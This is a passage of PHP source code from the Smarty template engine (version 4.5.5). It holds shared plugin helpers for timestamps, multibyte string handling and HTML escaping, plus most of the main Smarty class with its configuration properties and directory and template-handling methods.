    if (!preg_match('/^([\'"]?)[a-zA-Z0-9-]+(\\1)$/', $params[ $index ])) {
        throw new SmartyException(
            '$param[' . $index .
            '] is not a literal and is thus not evaluatable at compile time'
        );
    }
    $t = null;
    eval("\$t = " . $params[ $index ] . ";");
    return $t;
}
<?php
/**
 * Smarty shared plugin
 *
 * @package    Smarty
 * @subpackage PluginsShared
 */
/**
 * Function: smarty_make_timestamp
 * Purpose:  used by other smarty functions to make a timestamp from a string.
 *
 * @author Monte Ohrt <monte at ohrt dot com>
 *
 * @param DateTime|int|string $string date object, timestamp or string that can be converted using strtotime()
 *
 * @return int
 */
function smarty_make_timestamp($string)
{
    if (empty($string)) {
        // use "now":
        return time();
    } elseif ($string instanceof DateTime
              || (interface_exists('DateTimeInterface', false) && $string instanceof DateTimeInterface)
    ) {
        return (int)$string->format('U'); // PHP 5.2 BC
    } elseif (strlen($string) === 14 && ctype_digit($string)) {
        // it is mysql timestamp format of YYYYMMDDHHMMSS?
        return mktime(
            substr($string, 8, 2),
            substr($string, 10, 2),
            substr($string, 12, 2),
            substr($string, 4, 2),
            substr($string, 6, 2),
            substr($string, 0, 4)
        );
    } elseif (is_numeric($string)) {
        // it is a numeric string, we handle it as timestamp
        return (int)$string;
    } else {
        // strtotime should handle it
        $time = strtotime($string);
        if ($time === -1 || $time === false) {
            // strtotime() was not able to parse $string, use "now":
            return time();
        }
        return $time;
    }
}
<?php
/**
 * Smarty shared plugin
 *
 * @package    Smarty
 * @subpackage PluginsShared
 */
if (!function_exists('smarty_mb_str_replace')) {
    /**
     * Multibyte string replace
     *
     * @param string|string[] $search  the string to be searched
     * @param string|string[] $replace the replacement string
     * @param string          $subject the source string
     * @param int             &$count  number of matches found
     *
     * @return string replaced string
     * @author Rodney Rehm
     */
    function smarty_mb_str_replace($search, $replace, $subject, &$count = 0)
    {
        if (!is_array($search) && is_array($replace)) {
            return false;
        }
        if (is_array($subject)) {
            // call mb_replace for each single string in $subject
            foreach ($subject as &$string) {
                $string = smarty_mb_str_replace($search, $replace, $string, $c);
                $count += $c;
            }
        } elseif (is_array($search)) {
            if (!is_array($replace)) {
                foreach ($search as &$string) {
                    $subject = smarty_mb_str_replace($string, $replace, $subject, $c);
                    $count += $c;
                }
            } else {
                $n = max(count($search), count($replace));
                while ($n--) {
                    $subject = smarty_mb_str_replace(current($search), current($replace), $subject, $c);
                    $count += $c;
                    next($search);
                    next($replace);
                }
            }
        } else {
            $mb_reg_charset = mb_regex_encoding();
            // Check if mbstring regex is using UTF-8
            $reg_is_unicode = !strcasecmp($mb_reg_charset, "UTF-8");
            if(!$reg_is_unicode) {
                // ...and set to UTF-8 if not
                mb_regex_encoding("UTF-8");
            }

            // See if charset used by Smarty is matching one used by regex...
            $current_charset = mb_regex_encoding();
            $convert_result = (bool)strcasecmp(Smarty::$_CHARSET, $current_charset);
            if($convert_result) {
                // ...convert to it if not.
                $subject = mb_convert_encoding($subject, $current_charset, Smarty::$_CHARSET);
                $search = mb_convert_encoding($search, $current_charset, Smarty::$_CHARSET);
                $replace = mb_convert_encoding($replace, $current_charset, Smarty::$_CHARSET);
            }

            $parts = mb_split(preg_quote($search), $subject ?? "") ?: array();
            // If original regex encoding was not unicode...
            if(!$reg_is_unicode) {
                // ...restore original regex encoding to avoid breaking the system.
                mb_regex_encoding($mb_reg_charset);
            }
            if($parts === false) {
                // This exception is thrown if call to mb_split failed.
                // Usually it happens, when $search or $replace are not valid for given mb_regex_encoding().
                // There may be other cases for it to fail, please file an issue if you find a reproducible one.
                throw new SmartyException("Source string is not a valid $current_charset sequence (probably)");
            }

            $count = count($parts) - 1;
            $subject = implode($replace, $parts);
            // Convert results back to charset used by Smarty, if needed.
            if($convert_result) {
                $subject = mb_convert_encoding($subject, Smarty::$_CHARSET, $current_charset);
            }
        }
        return $subject;
    }
}
<?php
/**
 * Smarty shared plugin
 *
 * @package    Smarty
 * @subpackage PluginsShared
 */
/**
 * convert characters to their decimal unicode equivalents
 *
 * @link   http://www.ibm.com/developerworks/library/os-php-unicode/index.html#listing3 for inspiration
 *
 * @param string $string   characters to calculate unicode of
 * @param string $encoding encoding of $string, if null mb_internal_encoding() is used
 *
 * @return array sequence of unicodes
 * @author Rodney Rehm
 */
function smarty_mb_to_unicode($string, $encoding = null)
{
    if ($encoding) {
        $expanded = mb_convert_encoding($string, 'UTF-32BE', $encoding);
    } else {
        $expanded = mb_convert_encoding($string, 'UTF-32BE');
    }
    return unpack('N*', $expanded);
}

/**
 * convert unicodes to the character of given encoding
 *
 * @link   http://www.ibm.com/developerworks/library/os-php-unicode/index.html#listing3 for inspiration
 *
 * @param integer|array $unicode  single unicode or list of unicodes to convert
 * @param string        $encoding encoding of returned string, if null mb_internal_encoding() is used
 *
 * @return string unicode as character sequence in given $encoding
 * @author Rodney Rehm
 */
function smarty_mb_from_unicode($unicode, $encoding = null)
{
    $t = '';
    if (!$encoding) {
        $encoding = mb_internal_encoding();
    }
    foreach ((array)$unicode as $utf32be) {
        $character = pack('N*', $utf32be);
        $t .= mb_convert_encoding($character, $encoding, 'UTF-32BE');
    }
    return $t;
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsFilter
 */
/**
 * Smarty htmlspecialchars variablefilter plugin
 *
 * @param string                    $source input string
 * @param \Smarty_Internal_Template $template
 *
 * @return string filtered output
 */
function smarty_variablefilter_htmlspecialchars($source, Smarty_Internal_Template $template)
{
    return htmlspecialchars((string) $source, ENT_QUOTES, Smarty::$_CHARSET);
}
<?php
/**
 * Project:     Smarty: the PHP compiling template engine
 * File:        Smarty.class.php
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 3.0 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 * For questions, help, comments, discussion, etc., please join the
 * Smarty mailing list. Send a blank e-mail to
 * smarty-discussion-subscribe@googlegroups.com
 *
 * @link      https://www.smarty.net/
 * @copyright 2018 New Digital Group, Inc.
 * @copyright 2018 Uwe Tews
 * @author    Monte Ohrt <monte at ohrt dot com>
 * @author    Uwe Tews   <uwe dot tews at gmail dot com>
 * @author    Rodney Rehm
 * @package   Smarty
 */
/**
 * set SMARTY_DIR to absolute path to Smarty library files.
 * Sets SMARTY_DIR only if user application has not already defined it.
 */
if (!defined('SMARTY_DIR')) {
    /**
     *
     */
    define('SMARTY_DIR', __DIR__ . DIRECTORY_SEPARATOR);
}
/**
 * set SMARTY_SYSPLUGINS_DIR to absolute path to Smarty internal plugins.
 * Sets SMARTY_SYSPLUGINS_DIR only if user application has not already defined it.
 */
if (!defined('SMARTY_SYSPLUGINS_DIR')) {
    /**
     *
     */
    define('SMARTY_SYSPLUGINS_DIR', SMARTY_DIR . 'sysplugins' . DIRECTORY_SEPARATOR);
}
if (!defined('SMARTY_PLUGINS_DIR')) {
    /**
     *
     */
    define('SMARTY_PLUGINS_DIR', SMARTY_DIR . 'plugins' . DIRECTORY_SEPARATOR);
}
if (!defined('SMARTY_MBSTRING')) {
    /**
     *
     */
    define('SMARTY_MBSTRING', function_exists('mb_get_info'));
}

/**
 * Load helper functions
 */
if (!defined('SMARTY_HELPER_FUNCTIONS_LOADED')) {
    include __DIR__ . '/functions.php';
}

/**
 * Load Smarty_Autoloader
 */
if (!class_exists('Smarty_Autoloader')) {
    include __DIR__ . '/bootstrap.php';
}

/**
 * Load always needed external class files
 */
require_once SMARTY_SYSPLUGINS_DIR . 'smarty_internal_data.php';
require_once SMARTY_SYSPLUGINS_DIR . 'smarty_internal_extension_handler.php';
require_once SMARTY_SYSPLUGINS_DIR . 'smarty_internal_templatebase.php';
require_once SMARTY_SYSPLUGINS_DIR . 'smarty_internal_template.php';
require_once SMARTY_SYSPLUGINS_DIR . 'smarty_resource.php';
require_once SMARTY_SYSPLUGINS_DIR . 'smarty_variable.php';
require_once SMARTY_SYSPLUGINS_DIR . 'smarty_template_source.php';
require_once SMARTY_SYSPLUGINS_DIR . 'smarty_template_resource_base.php';
require_once SMARTY_SYSPLUGINS_DIR . 'smarty_internal_resource_file.php';

/**
 * This is the main Smarty class
 *
 * @package Smarty
 *
 * The following methods will be dynamically loaded by the extension handler when they are called.
 * They are located in a corresponding Smarty_Internal_Method_xxxx class
 *
 * @method int clearAllCache(int $exp_time = null, string $type = null)
 * @method int clearCache(string $template_name, string $cache_id = null, string $compile_id = null, int $exp_time = null, string $type = null)
 * @method int compileAllTemplates(string $extension = '.tpl', bool $force_compile = false, int $time_limit = 0, $max_errors = null)
 * @method int compileAllConfig(string $extension = '.conf', bool $force_compile = false, int $time_limit = 0, $max_errors = null)
 * @method int clearCompiledTemplate($resource_name = null, $compile_id = null, $exp_time = null)
 */
class Smarty extends Smarty_Internal_TemplateBase
{
    /**
     * smarty version
     */
    const SMARTY_VERSION = '4.5.5';
    /**
     * define variable scopes
     */
    const SCOPE_LOCAL    = 1;
    const SCOPE_PARENT   = 2;
    const SCOPE_TPL_ROOT = 4;
    const SCOPE_ROOT     = 8;
    const SCOPE_SMARTY   = 16;
    const SCOPE_GLOBAL   = 32;
    /**
     * define caching modes
     */
    const CACHING_OFF              = 0;
    const CACHING_LIFETIME_CURRENT = 1;
    const CACHING_LIFETIME_SAVED   = 2;
    /**
     * define constant for clearing cache files be saved expiration dates
     */
    const CLEAR_EXPIRED = -1;
    /**
     * define compile check modes
     */
    const COMPILECHECK_OFF       = 0;
    const COMPILECHECK_ON        = 1;
    const COMPILECHECK_CACHEMISS = 2;
    /**
     * define debug modes
     */
    const DEBUG_OFF        = 0;
    const DEBUG_ON         = 1;
    const DEBUG_INDIVIDUAL = 2;

    /**
     * filter types
     */
    const FILTER_POST     = 'post';
    const FILTER_PRE      = 'pre';
    const FILTER_OUTPUT   = 'output';
    const FILTER_VARIABLE = 'variable';
    /**
     * plugin types
     */
    const PLUGIN_FUNCTION         = 'function';
    const PLUGIN_BLOCK            = 'block';
    const PLUGIN_COMPILER         = 'compiler';
    const PLUGIN_MODIFIER         = 'modifier';
    const PLUGIN_MODIFIERCOMPILER = 'modifiercompiler';

    /**
     * assigned global tpl vars
     */
    public static $global_tpl_vars = array();

    /**
     * Flag denoting if Multibyte String functions are available
     */
    public static $_MBSTRING = SMARTY_MBSTRING;

    /**
     * The character set to adhere to (e.g. "UTF-8")
     */
    public static $_CHARSET = SMARTY_MBSTRING ? 'UTF-8' : 'ISO-8859-1';

    /**
     * The date format to be used internally
     * (accepts date() and strftime())
     */
    public static $_DATE_FORMAT = '%b %e, %Y';

    /**
     * Flag denoting if PCRE should run in UTF-8 mode
     */
    public static $_UTF8_MODIFIER = 'u';

    /**
     * Flag denoting if operating system is windows
     */
    public static $_IS_WINDOWS = false;

    /**
     * auto literal on delimiters with whitespace
     *
     * @var boolean
     */
    public $auto_literal = true;

    /**
     * display error on not assigned variables
     *
     * @var boolean
     */
    public $error_unassigned = false;

    /**
     * look up relative file path in include_path
     *
     * @var boolean
     */
    public $use_include_path = false;

    /**
     * flag if template_dir is normalized
     *
     * @var bool
     */
    public $_templateDirNormalized = false;

    /**
     * joined template directory string used in cache keys
     *
     * @var string
     */
    public $_joined_template_dir = null;

    /**
     * flag if config_dir is normalized
     *
     * @var bool
     */
    public $_configDirNormalized = false;

    /**
     * joined config directory string used in cache keys
     *
     * @var string
     */
    public $_joined_config_dir = null;

    /**
     * default template handler
     *
     * @var callable
     */
    public $default_template_handler_func = null;

    /**
     * default config handler
     *
     * @var callable
     */
    public $default_config_handler_func = null;

    /**
     * default plugin handler
     *
     * @var callable
     */
    public $default_plugin_handler_func = null;

    /**
     * flag if template_dir is normalized
     *
     * @var bool
     */
    public $_compileDirNormalized = false;

    /**
     * flag if plugins_dir is normalized
     *
     * @var bool
     */
    public $_pluginsDirNormalized = false;

    /**
     * flag if template_dir is normalized
     *
     * @var bool
     */
    public $_cacheDirNormalized = false;

    /**
     * force template compiling?
     *
     * @var boolean
     */
    public $force_compile = false;

    /**
     * use sub dirs for compiled/cached files?
     *
     * @var boolean
     */
    public $use_sub_dirs = false;

    /**
     * allow ambiguous resources (that are made unique by the resource handler)
     *
     * @var boolean
     */
    public $allow_ambiguous_resources = false;

    /**
     * merge compiled includes
     *
     * @var boolean
     */
    public $merge_compiled_includes = false;

    /*
    * flag for behaviour when extends: resource  and {extends} tag are used simultaneous
    *   if false disable execution of {extends} in templates called by extends resource.
    *   (behaviour as versions < 3.1.28)
    *
    * @var boolean
    */
    public $extends_recursion = true;

    /**
     * force cache file creation
     *
     * @var boolean
     */
    public $force_cache = false;

    /**
     * template left-delimiter
     *
     * @var string
     */
    public $left_delimiter = "{";

    /**
     * template right-delimiter
     *
     * @var string
     */
    public $right_delimiter = "}";

    /**
     * array of strings which shall be treated as literal by compiler
     *
     * @var array string
     */
    public $literals = array();

    /**
     * class name
     * This should be instance of Smarty_Security.
     *
     * @var string
     * @see Smarty_Security
     */
    public $security_class = 'Smarty_Security';

    /**
     * implementation of security class
     *
     * @var Smarty_Security
     */
    public $security_policy = null;

    /**
     * controls if the php template file resource is allowed
     *
     * @var bool
     */
    public $allow_php_templates = false;

    /**
     * debug mode
     * Setting this to true enables the debug-console.
     *
     * @var boolean
     */
    public $debugging = false;

    /**
     * This determines if debugging is enable-able from the browser.
     * <ul>
     *  <li>NONE => no debugging control allowed</li>
     *  <li>URL => enable debugging when SMARTY_DEBUG is found in the URL.</li>
     * </ul>
     *
     * @var string
     */
    public $debugging_ctrl = 'NONE';

    /**
     * Name of debugging URL-param.
     * Only used when $debugging_ctrl is set to 'URL'.
     * The name of the URL-parameter that activates debugging.
     *
     * @var string
     */
    public $smarty_debug_id = 'SMARTY_DEBUG';

    /**
     * Path of debug template.
     *
     * @var string
     */
    public $debug_tpl = null;

    /**
     * When set, smarty uses this value as error_reporting-level.
     *
     * @var int
     */
    public $error_reporting = null;

    /**
     * Controls whether variables with the same name overwrite each other.
     *
     * @var boolean
     */
    public $config_overwrite = true;

    /**
     * Controls whether config values of on/true/yes and off/false/no get converted to boolean.
     *
     * @var boolean
     */
    public $config_booleanize = true;

    /**
     * Controls whether hidden config sections/vars are read from the file.
     *
     * @var boolean
     */
    public $config_read_hidden = false;

    /**
     * locking concurrent compiles
     *
     * @var boolean
     */
    public $compile_locking = true;

    /**
     * Controls whether cache resources should use locking mechanism
     *
     * @var boolean
     */
    public $cache_locking = false;

    /**
     * seconds to wait for acquiring a lock before ignoring the write lock
     *
     * @var float
     */
    public $locking_timeout = 10;

    /**
     * resource type used if none given
     * Must be an valid key of $registered_resources.
     *
     * @var string
     */
    public $default_resource_type = 'file';

    /**
     * caching type
     * Must be an element of $cache_resource_types.
     *
     * @var string
     */
    public $caching_type = 'file';

    /**
     * config type
     *
     * @var string
     */
    public $default_config_type = 'file';

    /**
     * check If-Modified-Since headers
     *
     * @var boolean
     */
    public $cache_modified_check = false;

    /**
     * registered plugins
     *
     * @var array
     */
    public $registered_plugins = array();

    /**
     * registered objects
     *
     * @var array
     */
    public $registered_objects = array();

    /**
     * registered classes
     *
     * @var array
     */
    public $registered_classes = array();

    /**
     * registered filters
     *
     * @var array
     */
    public $registered_filters = array();

    /**
     * registered resources
     *
     * @var array
     */
    public $registered_resources = array();

    /**
     * registered cache resources
     *
     * @var array
     */
    public $registered_cache_resources = array();

    /**
     * autoload filter
     *
     * @var array
     */
    public $autoload_filters = array();

    /**
     * default modifier
     *
     * @var array
     */
    public $default_modifiers = array();

    /**
     * autoescape variable output
     *
     * @var boolean
     */
    public $escape_html = false;

    /**
     * start time for execution time calculation
     *
     * @var int
     */
    public $start_time = 0;

    /**
     * required by the compiler for BC
     *
     * @var string
     */
    public $_current_file = null;

    /**
     * internal flag to enable parser debugging
     *
     * @var bool
     */
    public $_parserdebug = false;

    /**
     * This object type (Smarty = 1, template = 2, data = 4)
     *
     * @var int
     */
    public $_objType = 1;

    /**
     * Debug object
     *
     * @var Smarty_Internal_Debug
     */
    public $_debug = null;

    /**
     * template directory
     *
     * @var array
     */
    protected $template_dir = array('./templates/');

    /**
     * flags for normalized template directory entries
     *
     * @var array
     */
    protected $_processedTemplateDir = array();

    /**
     * config directory
     *
     * @var array
     */
    protected $config_dir = array('./configs/');

    /**
     * flags for normalized template directory entries
     *
     * @var array
     */
    protected $_processedConfigDir = array();

    /**
     * compile directory
     *
     * @var string
     */
    protected $compile_dir = './templates_c/';

    /**
     * plugins directory
     *
     * @var array
     */
    protected $plugins_dir = array();

    /**
     * cache directory
     *
     * @var string
     */
    protected $cache_dir = './cache/';

    /**
     * removed properties
     *
     * @var string[]
     */
    protected $obsoleteProperties = array(
        'resource_caching', 'template_resource_caching', 'direct_access_security',
        '_dir_perms', '_file_perms', 'plugin_search_order',
        'inheritance_merge_compiled_includes', 'resource_cache_mode',
    );

    /**
     * List of private properties which will call getter/setter on a direct access
     *
     * @var string[]
     */
    protected $accessMap = array(
        'template_dir' => 'TemplateDir', 'config_dir' => 'ConfigDir',
        'plugins_dir'  => 'PluginsDir', 'compile_dir' => 'CompileDir',
        'cache_dir'    => 'CacheDir',
    );

    /**
     * PHP7 Compatibility mode
     * @var bool
     */
    private $isMutingUndefinedOrNullWarnings = false;

    /**
     * Initialize new Smarty object
     */
    public function __construct()
    {
        $this->_clearTemplateCache();
        parent::__construct();
        if (is_callable('mb_internal_encoding')) {
            mb_internal_encoding(Smarty::$_CHARSET);
        }
        $this->start_time = microtime(true);
        if (isset($_SERVER[ 'SCRIPT_NAME' ])) {
            Smarty::$global_tpl_vars[ 'SCRIPT_NAME' ] = new Smarty_Variable($_SERVER[ 'SCRIPT_NAME' ]);
        }
        // Check if we're running on windows
        Smarty::$_IS_WINDOWS = strtoupper(substr(PHP_OS, 0, 3)) === 'WIN';
        // let PCRE (preg_*) treat strings as ISO-8859-1 if we're not dealing with UTF-8
        if (Smarty::$_CHARSET !== 'UTF-8') {
            Smarty::$_UTF8_MODIFIER = '';
        }
    }

    /**
     * Check if a template resource exists
     *
     * @param string $resource_name template name
     *
     * @return bool status
     * @throws \SmartyException
     */
    public function templateExists($resource_name)
    {
        // create source object
        $source = Smarty_Template_Source::load(null, $this, $resource_name);
        return $source->exists;
    }

    /**
     * Loads security class and enables security
     *
     * @param string|Smarty_Security $security_class if a string is used, it must be class-name
     *
     * @return Smarty                 current Smarty instance for chaining
     * @throws \SmartyException
     */
    public function enableSecurity($security_class = null)
    {
        Smarty_Security::enableSecurity($this, $security_class);
        return $this;
    }

    /**
     * Disable security
     *
     * @return Smarty current Smarty instance for chaining
     */
    public function disableSecurity()
    {
        $this->security_policy = null;
        return $this;
    }

    /**
     * Add template directory(s)
     *
     * @param string|array $template_dir directory(s) of template sources
     * @param string       $key          of the array element to assign the template dir to
     * @param bool         $isConfig     true for config_dir
     *
     * @return Smarty          current Smarty instance for chaining
     */
    public function addTemplateDir($template_dir, $key = null, $isConfig = false)
    {
        if ($isConfig) {
            $processed = &$this->_processedConfigDir;
            $dir = &$this->config_dir;
            $this->_configDirNormalized = false;
        } else {
            $processed = &$this->_processedTemplateDir;
            $dir = &$this->template_dir;
            $this->_templateDirNormalized = false;
        }
        if (is_array($template_dir)) {
            foreach ($template_dir as $k => $v) {
                if (is_int($k)) {
                    // indexes are not merged but appended
                    $dir[] = $v;
                } else {
                    // string indexes are overridden
                    $dir[ $k ] = $v;
                    unset($processed[ $key ]);
                }
            }
        } else {
            if ($key !== null) {
                // override directory at specified index
                $dir[ $key ] = $template_dir;
                unset($processed[ $key ]);
            } else {
                // append new directory
                $dir[] = $template_dir;
            }
        }
        return $this;
    }

    /**
     * Get template directories
     *
     * @param mixed $index    index of directory to get, null to get all
     * @param bool  $isConfig true for config_dir
     *
     * @return array|string list of template directories, or directory of $index
     */
    public function getTemplateDir($index = null, $isConfig = false)
    {
        if ($isConfig) {
            $dir = &$this->config_dir;
        } else {
            $dir = &$this->template_dir;
        }
        if ($isConfig ? !$this->_configDirNormalized : !$this->_templateDirNormalized) {
            $this->_normalizeTemplateConfig($isConfig);
        }
        if ($index !== null) {
            return isset($dir[ $index ]) ? $dir[ $index ] : null;
        }
        return $dir;
    }

    /**
     * Set template directory
     *
     * @param string|array $template_dir directory(s) of template sources
     * @param bool         $isConfig     true for config_dir
     *
     * @return \Smarty current Smarty instance for chaining
     */
    public function setTemplateDir($template_dir, $isConfig = false)
    {
        if ($isConfig) {
            $this->config_dir = array();
            $this->_processedConfigDir = array();
        } else {
            $this->template_dir = array();
            $this->_processedTemplateDir = array();
        }
        $this->addTemplateDir($template_dir, null, $isConfig);
        return $this;
    }

    /**
     * Add config directory(s)
     *
     * @param string|array $config_dir directory(s) of config sources
     * @param mixed        $key        key of the array element to assign the config dir to
     *
     * @return Smarty current Smarty instance for chaining
     */
    public function addConfigDir($config_dir, $key = null)
    {
        return $this->addTemplateDir($config_dir, $key, true);
    }

    /**
     * Get config directory
     *
     * @param mixed $index index of directory to get, null to get all
     *
     * @return array configuration directory
     */
    public function getConfigDir($index = null)
    {
        return $this->getTemplateDir($index, true);
    }

    /**
     * Set config directory
     *
     * @param $config_dir
     *
     * @return Smarty       current Smarty instance for chaining
     */
    public function setConfigDir($config_dir)
    {
        return $this->setTemplateDir($config_dir, true);
    }

    /**
     * Adds directory of plugin files
     *
     * @param null|array|string $plugins_dir
     *
     * @return Smarty current Smarty instance for chaining
     */
    public function addPluginsDir($plugins_dir)
    {
        if (empty($this->plugins_dir)) {
            $this->plugins_dir[] = SMARTY_PLUGINS_DIR;
        }
        $this->plugins_dir = array_merge($this->plugins_dir, (array)$plugins_dir);
        $this->_pluginsDirNormalized = false;
        return $this;
    }

    /**
     * Get plugin directories
     *
     * @return array list of plugin directories
     */
    public function getPluginsDir()
    {
        if (empty($this->plugins_dir)) {
            $this->plugins_dir[] = SMARTY_PLUGINS_DIR;
            $this->_pluginsDirNormalized = false;
        }
        if (!$this->_pluginsDirNormalized) {
            if (!is_array($this->plugins_dir)) {
                $this->plugins_dir = (array)$this->plugins_dir;
            }
            foreach ($this->plugins_dir as $k => $v) {
                $this->plugins_dir[ $k ] = $this->_realpath(rtrim($v ?? '', '/\\') . DIRECTORY_SEPARATOR, true);
            }
            $this->_cache[ 'plugin_files' ] = array();
            $this->_pluginsDirNormalized = true;
        }
        return $this->plugins_dir;
    }

    /**
     * Set plugins directory
     *
     * @param string|array $plugins_dir directory(s) of plugins
     *
     * @return Smarty       current Smarty instance for chaining
     */
    public function setPluginsDir($plugins_dir)
    {
        $this->plugins_dir = (array)$plugins_dir;
        $this->_pluginsDirNormalized = false;
        return $this;
    }

    /**
     * Get compiled directory
     *
     * @return string path to compiled templates
     */
    public function getCompileDir()
    {
        if (!$this->_compileDirNormalized) {
            $this->_normalizeDir('compile_dir', $this->compile_dir);
            $this->_compileDirNormalized = true;
        }
        return $this->compile_dir;
    }

    /**
     *
     * @param  string $compile_dir directory to store compiled templates in
     *
     * @return Smarty current Smarty instance for chaining
     */
    public function setCompileDir($compile_dir)
    {
        $this->_normalizeDir('compile_dir', $compile_dir);
        $this->_compileDirNormalized = true;
        return $this;
    }

    /**
     * Get cache directory
     *
     * @return string path of cache directory
     */
    public function getCacheDir()
    {
        if (!$this->_cacheDirNormalized) {
            $this->_normalizeDir('cache_dir', $this->cache_dir);
            $this->_cacheDirNormalized = true;
        }
        return $this->cache_dir;
    }

    /**
     * Set cache directory
     *
     * @param string $cache_dir directory to store cached templates in
     *
     * @return Smarty current Smarty instance for chaining
     */
    public function setCacheDir($cache_dir)
    {
        $this->_normalizeDir('cache_dir', $cache_dir);
        $this->_cacheDirNormalized = true;
        return $this;
    }

    /**
     * creates a template object
     *
     * @param string  $template   the resource handle of the template file
     * @param mixed   $cache_id   cache id to be used with this template
     * @param mixed   $compile_id compile id to be used with this template
     * @param object  $parent     next higher level of Smarty variables
     * @param boolean $do_clone   flag is Smarty object shall be cloned
     *
     * @return \Smarty_Internal_Template template object
     * @throws \SmartyException
     */
    public function createTemplate($template, $cache_id = null, $compile_id = null, $parent = null, $do_clone = true)
    {
        if ($cache_id !== null && (is_object($cache_id) || is_array($cache_id))) {
            $parent = $cache_id;
            $cache_id = null;
        }
        if ($parent !== null && is_array($parent)) {
            $data = $parent;
            $parent = null;
        } else {
            $data = null;
        }
        if (!$this->_templateDirNormalized) {
            $this->_normalizeTemplateConfig(false);
        }
        $_templateId = $this->_getTemplateId($template, $cache_id, $compile_id);
        $tpl = null;
        if ($this->caching && isset(Smarty_Internal_Template::$isCacheTplObj[ $_templateId ])) {
            $tpl = $do_clone ? clone Smarty_Internal_Template::$isCacheTplObj[ $_templateId ] :
                Smarty_Internal_Template::$isCacheTplObj[ $_templateId ];
            $tpl->inheritance = null;
            $tpl->tpl_vars = $tpl->config_vars = array();
        } elseif (!$do_clone && isset(Smarty_Internal_Template::$tplObjCache[ $_templateId ])) {
            $tpl = clone Smarty_Internal_Template::$tplObjCache[ $_templateId ];
            $tpl->inheritance = null;
            $tpl->tpl_vars = $tpl->config_vars = array();
        } else {
            /* @var Smarty_Internal_Template $tpl */
            $tpl = new $this->template_class($template, $this, null, $cache_id, $compile_id, null, null);
            $tpl->templateId = $_templateId;
        }
        if ($do_clone) {
            $tpl->smarty = clone $tpl->smarty;
        }
        $tpl->parent = $parent ? $parent : $this;
        // fill data if present
        if (!empty($data) && is_array($data)) {
            // set up variable values
            foreach ($data as $_key => $_val) {
                $tpl->tpl_vars[ $_key ] = new Smarty_Variable($_val);
            }
        }
        if ($this->debugging || $this->debugging_ctrl === 'URL') {
            $tpl->smarty->_debug = new Smarty_Internal_Debug();
            // check URL debugging control
            if (!$this->debugging && $this->debugging_ctrl === 'URL') {
                $tpl->smarty->_debug->debugUrl($tpl->smarty);
            }
        }
        return $tpl;
    }

    /**
     * Takes unknown classes and loads plugin files for them
     * class name format: Smarty_PluginType_PluginName
     * plugin filename format: plugintype.pluginname.php
     *
     * @param string $plugin_name class plugin name to load
     * @param bool   $check       check if already loaded
     *
     * @return string |boolean filepath of loaded file or false
     * @throws \SmartyException
     */
    public function loadPlugin($plugin_name, $check = true)
    {
        return $this->ext->loadPlugin->loadPlugin($this, $plugin_name, $check);
    }

    /**
     * Get unique template id
     *
     * @param string                         $template_name
     * @param null|mixed                     $cache_id
     * @param null|mixed                     $compile_id
     * @param null                           $caching
     * @param \Smarty_Internal_Template|null $template
     *
     * @return string
     * @throws \SmartyException
     */
    public function _getTemplateId(
        $template_name,
        $cache_id = null,
        $compile_id = null,
        $caching = null,
        ?Smarty_Internal_Template $template = null
    ) {
        $template_name = (strpos($template_name, ':') === false) ? "{$this->default_resource_type}:{$template_name}" :
            $template_name;
        $cache_id = $cache_id === null ? $this->cache_id : $cache_id;
        $compile_id = $compile_id === null ? $this->compile_id : $compile_id;
        $caching = (int)($caching === null ? $this->caching : $caching);
        if ((isset($template) && strpos($template_name, ':.') !== false) || $this->allow_ambiguous_resources) {
            $_templateId =
                Smarty_Resource::getUniqueTemplateName((isset($template) ? $template : $this), $template_name) .
                "#{$cache_id}#{$compile_id}#{$caching}";
        } else {
            $_templateId = $this->_joined_template_dir . "#{$template_name}#{$cache_id}#{$compile_id}#{$caching}";
        }
        if (isset($_templateId[ 150 ])) {
            $_templateId = sha1($_templateId);
        }
        return $_templateId;
    }

    /**
     * Normalize path
     *  - remove /./ and /../
     *  - make it absolute if required
     *
     * @param string $path     file path
     * @param bool   $realpath if true - convert to absolute
     *                         false - convert to relative
     *                         null - keep as it is but
     *                         remove /./ /../
     *
     * @return string
     */
    public function _realpath($path, $realpath = null)
    {
        $nds = array('/' => '\\', '\\' => '/');
        preg_match(
            '%^(?<root>(?:[[:alpha:]]:[\\\\/]|/|[\\\\]{2}[[:alpha:]]+|[[:print:]]{2,}:[/]{2}|[\\\\])?)(?<path>(.*))$%u',
            $path,
            $parts
        );
        $path = $parts[ 'path' ];
        if ($parts[ 'root' ] === '\\') {
            $parts[ 'root' ] = substr(getcwd(), 0, 2) . $parts[ 'root' ];
        } else {
            if ($realpath !== null && !$parts[ 'root' ]) {
                $path = getcwd() . DIRECTORY_SEPARATOR . $path;
            }
        }
        // normalize DIRECTORY_SEPARATOR
        $path = str_replace($nds[ DIRECTORY_SEPARATOR ], DIRECTORY_SEPARATOR, $path);
        $parts[ 'root' ] = str_replace($nds[ DIRECTORY_SEPARATOR ], DIRECTORY_SEPARATOR, $parts[ 'root' ]);
        do {
            $path = preg_replace(
                array('#[\\\\/]{2}#', '#[\\\\/][.][\\\\/]#', '#[\\\\/]([^\\\\/.]+)[\\\\/][.][.][\\\\/]#'),
                DIRECTORY_SEPARATOR,
                $path,
                -1,
                $count
            );
        } while ($count > 0);
        return $realpath !== false ? $parts[ 'root' ] . $path : str_ireplace(getcwd(), '.', $parts[ 'root' ] . $path);
    }

    /**
     * Empty template objects cache
     */
    public function _clearTemplateCache()
    {
        Smarty_Internal_Template::$isCacheTplObj = array();
        Smarty_Internal_Template::$tplObjCache = array();
    }

    /**
     * @param boolean $use_sub_dirs
     */
    public function setUseSubDirs($use_sub_dirs)
    {
        $this->use_sub_dirs = $use_sub_dirs;
    }

    /**
     * @param int $error_reporting
     */
    public function setErrorReporting($error_reporting)
    {
        $this->error_reporting = $error_reporting;
    }

    /**
     * @param boolean $escape_html
     */
    public function setEscapeHtml($escape_html)
    {
        $this->escape_html = $escape_html;
    }

    /**
     * Return auto_literal flag
     *
     * @return boolean
     */
